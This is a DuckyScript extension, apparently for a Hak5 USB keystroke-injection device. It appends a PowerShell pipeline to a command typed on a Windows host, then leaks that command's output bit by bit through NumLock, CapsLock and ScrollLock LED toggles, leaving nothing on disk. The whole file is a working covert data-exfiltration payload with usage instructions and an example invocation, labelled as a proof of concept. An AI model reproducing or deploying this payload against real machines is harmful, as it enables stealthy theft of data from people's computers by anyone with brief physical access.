EXTENSION WINDOWS_FILELESS_HID_EXFIL
REM VERSION 1.0
REM AUTHOR: 0i41E
REM_BLOCK DOCUMENTATION
Extension for Keystroke Reflection data exfiltration that writes nothing to the target's disk: the data leaves the host over the keyboard lock-key LEDs, not over a file or the network.
This extension is a proof of concept for USB HID-only data exfiltration and is based on Hak5's original Keystroke Reflection method.
TARGET:
Windows hosts with PowerShell and the .NET System.Windows.Forms SendKeys class available. The payload relies on Add-Type and .NET method calls, which are typically blocked under PowerShell Constrained Language Mode, so it needs Full Language Mode on the target.
USAGE:
Type out your PowerShell command or script with STRING (do not press Enter yet), then call Windows_Fileless_HID_Exfil() directly after it. The function appends the exfil pipeline to that same command line and executes it with a single Enter.
It captures the command's/script's output into a variable and exfiltrates it via lock-key toggles, 8 toggles per character (NUMLOCK = 1, CAPSLOCK = 0, MSB first), with a final SCROLLLOCK toggle as end-of-transmission marker. Only the low 8 bits of each character are sent, so non-ASCII output is truncated. The PowerShell window exits once the keystrokes have been sent.
Example Usage:
GUI r
DELAY 500
STRINGLN powershell
DELAY 1000
STRING echo "This is my test"
Windows_Fileless_HID_Exfil()
END_REM
FUNCTION Windows_Fileless_HID_Exfil()
REM Appends an exfil pipeline to the PowerShell command line that was typed
REM (but not executed) before this call, executes it, and reads the command's
REM output back through the keyboard lock-key LEDs (Keystroke Reflection).
REM Nothing is written to the target's disk; the only channel is the HID LED report.
REM Precondition: a PowerShell prompt has focus and the command has been typed with STRING.
DELAY 250
REM Saving current Keyboard lock keys
SAVE_HOST_KEYBOARD_LOCK_STATE
REM Put the device into exfil mode so LED toggles are recorded as data bits.
$_EXFIL_MODE_ENABLED = TRUE
$_EXFIL_LEDS_ENABLED = TRUE
DELAY 500
REM Setting the output as variable
REM Out-String flattens the pipeline output into one string (it normally appends a trailing newline).
STRING |Out-String|Set-Variable -Name "DD";
REM Converting output into Lock Key values
REM One char -> 8 toggles, MSB first (mask 0x80 down to 0x01):
REM   set bit = NUMLOCK toggle, clear bit = CAPSLOCK toggle,
REM   then one SCROLLLOCK toggle as the end-of-transmission marker.
REM Only the low 8 bits of each char are tested, so chars above 0xFF are silently
REM truncated (non-ASCII output is lossy).
STRING $BL = $DD.ToCharArray();$c = "";foreach ($b in $BL){foreach ($a in 0x80,0x40,0x20,0x10,0x08,0x04,0x02,0x01){if ($b -band $a){$c += '%{NUMLOCK}'}else{$c += '%{CAPSLOCK}'}}}$c += '%{SCROLLLOCK}';
REM Exfiltrating via Keystroke Reflection
REM SendWait types the toggle sequence; in SendKeys syntax '%' is the Alt modifier,
REM so each toggle is sent as Alt+<lock key>.
REM NOTE(review): Add-Type and the .NET method calls above are typically blocked
REM under Constrained Language Mode; there the line errors out and nothing is reflected.
REM 'exit' closes the PowerShell session once the keystrokes have been sent.
STRINGLN Add-Type -A System.Windows.Forms;[System.Windows.Forms.SendKeys]::SendWait($c);exit
REM The final SCROLLLOCK value will be sent to indicate that EXFIL is complete.
REM NOTE(review): this wait has no timeout; if the PowerShell line never runs
REM (focus lost, language-mode/AMSI block, SendKeys unavailable) the payload hangs here.
WAIT_FOR_SCROLL_CHANGE
REM Solid green = transmission complete.
LED_G
$_EXFIL_MODE_ENABLED = FALSE
REM NOTE(review): $_EXFIL_LEDS_ENABLED is left TRUE after exfil; confirm whether it should be reset here too.
RESTORE_HOST_KEYBOARD_LOCK_STATE
END_FUNCTION
END_EXTENSION